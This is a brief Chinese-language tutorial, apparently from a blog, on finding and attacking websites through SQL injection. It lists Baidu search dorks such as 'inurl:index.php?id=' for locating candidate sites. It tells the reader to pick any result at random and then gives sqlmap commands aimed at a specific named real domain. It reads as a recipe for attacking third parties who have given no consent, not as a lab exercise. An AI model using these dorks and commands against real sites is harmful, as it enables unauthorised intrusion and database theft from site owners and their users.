百度中输入:
inurl:index.php?id=
inurl:index.php?cid=
inurl:login.php?id=
…
等等之类的进行查找,如下图,随便找一个然后从快照链接里点进去
然后用sqlMap工具进入sql注入测试。
sqlmap -u https://www.createview.com.cn/index.php?m=content&c=index&a=show&catid=16&id=102
sqlmap -u https://www.createview.com.cn/index.php?m=content